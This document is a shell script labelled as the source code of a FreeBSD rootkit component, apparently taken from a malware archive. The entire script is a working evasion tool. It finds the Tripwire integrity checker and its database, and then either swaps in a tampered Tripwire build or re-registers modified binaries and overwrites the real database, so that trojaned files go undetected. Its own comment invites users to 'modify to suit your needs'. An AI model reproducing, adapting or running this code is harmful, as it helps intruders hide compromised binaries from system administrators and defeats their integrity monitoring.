Rootkit.FreeBSD.Agent.e - Source Code

1. #!/bin/sh
2. # Simple script to avoid detection by tripwire. Modify to suit your needs.
3.  
4. echo -n "Trying to guess the location of tripwire. . ."
5.  
6. TRIPWIRE=`which tripwire`
7.  
8. if [ ! -x $TRIPWIRE ]; then
9.     echo "Failed!"
10.     echo -n "Please enter a full path to tripwire: "
11.  
12.     while read TRIPWIRE; do
13.         if [ -x $TRIPWIRE ]; then
14.             echo "Ok."
15.             break
16.         else
17.             echo -n "That doesn't exist! Try again: "
18.         fi
19.     done
20. else
21.     echo "Ok: $TRIPWIRE"
22. fi
23.  
24. echo -n "Trying to guess the location of the tripwire database. . ."
25.  
26. DBPATH="/usr/adm/tcheck/databases/tw.db"
27.  
28. if [ ! -f $DBPATH ]; then
29.     echo "Failed!"
30.     echo -n "Please enter the name of the database file: "
31.  
32.     while read DBPATH; do
33.         if [ -f $DBPATH ]; then
34.             echo "Ok."
35.             break
36.         else
37.             echo -n "That doesn't exist! Try again: "
38.         fi
39.     done
40. else
41.     echo "Ok: $DBPATH"
42. fi
43.  
44. DONE=false
45. while [ $DONE = "false" ]; do
46.     DONE=true
47.     echo -n "Is the database file read-only?[y(n)] "
48.     read ANSWER
49.     case $ANSWER in
50.         [yY] )
51.             make tripwire-inst
52.             install.sh $TRIPWIRE
53.             exit 0 ;;
54.         [nN] )
55.             break ;;
56.         * )
57.             echo "Yes or No"\!
58.             DONE=false ;;
59.     esac
60. done
61.  
62. DBFILE=./databases/`basename $DBPATH`
63.  
64. for BIN; do
65.     echo -n "Updating $BIN. . ."
66.     $TRIPWIRE -update $BIN
67.     mv $DBFILE $DBPATH
68.     echo "done."
69. done
70.  
71. echo "All done here chief!"